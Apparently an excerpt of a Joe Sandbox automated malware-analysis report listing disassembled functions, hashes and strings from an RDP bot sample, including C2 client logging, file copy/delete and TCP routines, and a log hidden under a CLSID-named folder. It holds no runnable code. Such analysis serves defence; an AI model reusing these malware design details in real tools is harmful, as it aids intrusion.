                                                      • Instruction ID: 0ba6fa1ac3781818ec53cd46836195fac4f13ce86c951bf90bb079cdefcb5604
                                                      • Opcode Fuzzy Hash: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
                                                      • Instruction Fuzzy Hash: 38418121B0E64996F7209B10E8743AA7361BB8AF82F950431EB0D47793CF7DE5858708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                                                      • API String ID: 513531256-3034662401
                                                      • Opcode ID: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
                                                      • Instruction ID: 6549bf4aa308615094f03ddc1c0a841893b76dfd3a3d1551e2003938b69c3228
                                                      • Opcode Fuzzy Hash: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
                                                      • Instruction Fuzzy Hash: 0F417E67B1EA418AF362AB11E8703FA6290EB847E4F804031DA0D4BB97CF2CE555C749
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                      • API String ID: 2918714741-1670302297
                                                      • Opcode ID: f046acac88eb62b3feff1e80da97ec2868d64679d8ce197bad3e6f2254f12524
                                                      • Instruction ID: 81757724593b3b5dbe39d3ebfbeeb69a93a788785c831eecebb88ea66c7f562b
                                                      • Opcode Fuzzy Hash: f046acac88eb62b3feff1e80da97ec2868d64679d8ce197bad3e6f2254f12524
                                                      • Instruction Fuzzy Hash: DA21A067B09A8386F7529F15E960BAA26E0FB847E8F444032EE4C47756CF3CD846C745
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: CopyErrorFileLastfflushfwrite
                                                      • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                      • API String ID: 2887799713-3464183404
                                                      • Opcode ID: abeee46ed548c0300b91caecac4e073b6ecdf4de12b2e01da956357d17c63fff
                                                      • Instruction ID: 0f7bfe22f08e751c8bc6b1324e1a4e2bc7ddd671eb8630672f3fc6ec5c0ec98f
                                                      • Opcode Fuzzy Hash: abeee46ed548c0300b91caecac4e073b6ecdf4de12b2e01da956357d17c63fff
                                                      • Instruction Fuzzy Hash: 45414DD1D0C61B86FB24BA15BC04F79E6647F40B8CED40132D94F0A698FFACAA819731
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: DeleteErrorFileLast
                                                      • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                      • API String ID: 2018770650-4119452840
                                                      • Opcode ID: 3481a8a7b8046b2c6ab42afb30bdd3258bdedae9a155e12ccb222bea2978765e
                                                      • Instruction ID: ff4b4facfce6b67e4ba4fe946a194c0465b346b8f2587fde588e925005f19f99
                                                      • Opcode Fuzzy Hash: 3481a8a7b8046b2c6ab42afb30bdd3258bdedae9a155e12ccb222bea2978765e
                                                      • Instruction Fuzzy Hash: 2E310CD2E1C20B82FA21B754BC40FBCA1525F51758FE90532D91F0A6D9EF2CAD859722
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsend
                                                      • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                      • API String ID: 1802528911-690514478
                                                      • Opcode ID: 670191f5258ba8218d32dc0bec4fe6d6a4bc0dce6a9aabdc1e94b7983a4c5b0e
                                                      • Instruction ID: 7634b41df5d8e1c663f25d1efb26dd5051ccb04401825cd136189240887d777d
                                                      • Opcode Fuzzy Hash: 670191f5258ba8218d32dc0bec4fe6d6a4bc0dce6a9aabdc1e94b7983a4c5b0e
                                                      • Instruction Fuzzy Hash: 46210E10B1A50A86EE304625A8B07B596106F07FF6E044730EE2D46BD3CE2EE401C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsend
                                                      • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                      • API String ID: 1802528911-690514478
                                                      • Opcode ID: c4a79d48bdbd81d09df92eddbf59bd6ddabe9ce4bd700108570dbed55343cebb
                                                      • Instruction ID: da17445341665af0081d551592e5f2532c41d8e77883c546f277ea8f09a01001
                                                      • Opcode Fuzzy Hash: c4a79d48bdbd81d09df92eddbf59bd6ddabe9ce4bd700108570dbed55343cebb
                                                      • Instruction Fuzzy Hash: CC21F69BB0A91781FA228F16B9647B51651AF147F4F640331DC2C4B7D3CE2CE8068349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                      • API String ID: 1729277954-887953274
                                                      • Opcode ID: 605e5dfe5316b9558873a97cd0172d1b66de96df917e4ad6386524e0d2362a8b
                                                      • Instruction ID: 297334256eb1f45a680d9ec563359ad505776e4af82cdd0602a6bf697290c790
                                                      • Opcode Fuzzy Hash: 605e5dfe5316b9558873a97cd0172d1b66de96df917e4ad6386524e0d2362a8b
                                                      • Instruction Fuzzy Hash: 4B112978B0954E46F7119F15F8282B66660FF8AB50F004235FA6E83BE2EF7CD5098B04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                      • API String ID: 1729277954-887953274
                                                      • Opcode ID: 5924f4c66a108cad5fd152d05af5215a3e148a378faf60fd7981241a8527150a
                                                      • Instruction ID: fc15e26271b8e92eb4aea11a3f151c5fd420cb06f00bbc9d6da593be96b647f5
                                                      • Opcode Fuzzy Hash: 5924f4c66a108cad5fd152d05af5215a3e148a378faf60fd7981241a8527150a
                                                      • Instruction Fuzzy Hash: C011D677B0A58A86E321EF15E4102656660AF8AF44F100232EE5D877A6DF7CD506CB04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                      • API String ID: 1729277954-887953274
                                                      • Opcode ID: b07a770b908fa1096c59fb9ac351aa77aea0ab2bcd9760c3c3baf614f33bbee9
                                                      • Instruction ID: 09cd0a4f7866ccf1d09085a85a232e7c176b4200e1d09a3a17329d6b9fe17232
                                                      • Opcode Fuzzy Hash: b07a770b908fa1096c59fb9ac351aa77aea0ab2bcd9760c3c3baf614f33bbee9
                                                      • Instruction Fuzzy Hash: 6111E672B1A54286F3119B2AF8104656660FF887F4F504232E96D83BA2DF7CD5498B08
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                      • API String ID: 1729277954-887953274
                                                      • Opcode ID: 748a5e74e8c44ec1b467f4e4ce8b8a3697105510733cea6cee6116d56241620e
                                                      • Instruction ID: 81e477de3ab55d8922887acaaa674ac59e961fa24be574ff51aada18e67eeb24
                                                      • Opcode Fuzzy Hash: 748a5e74e8c44ec1b467f4e4ce8b8a3697105510733cea6cee6116d56241620e
                                                      • Instruction Fuzzy Hash: 6F117839B0E14B86F3119F25E410276A660EF9AF54F400231EA2D837A3CF7CE00ACB08
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                      • API String ID: 1729277954-887953274
                                                      • Opcode ID: aca1936f00035b590d4bf7e1ee5d9f01a821306a4c819533e58a4271cc640142
                                                      • Instruction ID: 98625ee517b682ee8cd3f34c13046e2051630c041223346c7573dece985e58fe
                                                      • Opcode Fuzzy Hash: aca1936f00035b590d4bf7e1ee5d9f01a821306a4c819533e58a4271cc640142
                                                      • Instruction Fuzzy Hash: 92113F70B0954D8BE7109F15E450776A650FF8AF41F004235EA5D83BA6DFBCD105CB08
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                      • API String ID: 1729277954-887953274
                                                      • Opcode ID: d8d195c563035d49da54626cb804cd32bfd519d752622ef37f2863a34b2ae3a6
                                                      • Instruction ID: cf726bf13c81265fc527cb66dbac80a43af852525e3f3f5d235090c08801b01d
                                                      • Opcode Fuzzy Hash: d8d195c563035d49da54626cb804cd32bfd519d752622ef37f2863a34b2ae3a6
                                                      • Instruction Fuzzy Hash: AD11E6B3B0954286F321AB16F4101AA6660FF887F4F204235E96D83BA6DF7CD5098B09
                                                      APIs
                                                      Strings
                                                      • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFDA5BA34BE
                                                      • routine_tx, xrefs: 00007FFDA5BA34B7
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                                                      • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                      • API String ID: 2539320189-3555278722
                                                      • Opcode ID: e6631ef8d311fc8e6378ff11d32a685ead571647d0de98cc4c0c206d57fd6105
                                                      • Instruction ID: 6ffdb05d17b1237cb393f41c2b8ddeb1715c0a8e1484b1a43e7ce31f04f14f3b
                                                      • Opcode Fuzzy Hash: e6631ef8d311fc8e6378ff11d32a685ead571647d0de98cc4c0c206d57fd6105
                                                      • Instruction Fuzzy Hash: F6311E31B0AA0A93EA208F11F8A037A73A0FF4AF86F154435DA5D477A6CF7DE5458308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                                                      • API String ID: 3472027048-1600310168
                                                      • Opcode ID: f2bcfa2bc7fd74ed5834c0d92b34421618f75ae7b5ee43493b71ab7504d8d78a
                                                      • Instruction ID: b75464675b08dd9e41694266541e1def9c391b86e8b928986ffcf035579ae200
                                                      • Opcode Fuzzy Hash: f2bcfa2bc7fd74ed5834c0d92b34421618f75ae7b5ee43493b71ab7504d8d78a
                                                      • Instruction Fuzzy Hash: 3351812BF0E68385FA629B14E4703BA2391AF943F8F504231D66D477D7DE6CE446870A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: AttributesErrorFileLast
                                                      • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                      • API String ID: 1799206407-4111913120
                                                      • Opcode ID: 9fd092705476f9e829ae0a70b8e605f60111ddf5aa69cb2b420b7b88268eb666
                                                      • Instruction ID: aadd38dbae52b71cd8f7280e0d46b752a0284e8561e16f3163759654bc9c93f2
                                                      • Opcode Fuzzy Hash: 9fd092705476f9e829ae0a70b8e605f60111ddf5aa69cb2b420b7b88268eb666
                                                      • Instruction Fuzzy Hash: 6021A65BF0E8CBE2F76ACE99A46037D11519F03B09F604532D90E89393CE6CA885934E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: AttributesErrorFileLast
                                                      • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                      • API String ID: 1799206407-4111913120
                                                      • Opcode ID: 929e29d4a2ed9aacb65dc4a4a38bd86f9df3ddd46ca05e0a2ff193934f66b942
                                                      • Instruction ID: dfb481f39f008c35cbc69b588e86cdd95959c925229235e69ce2b3fa7a0d5f38
                                                      • Opcode Fuzzy Hash: 929e29d4a2ed9aacb65dc4a4a38bd86f9df3ddd46ca05e0a2ff193934f66b942
                                                      • Instruction Fuzzy Hash: F52193D0E2C98382FB646658BC84B7DD2625F54349FE44932F10F8A5D8CF2CEE8552A2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
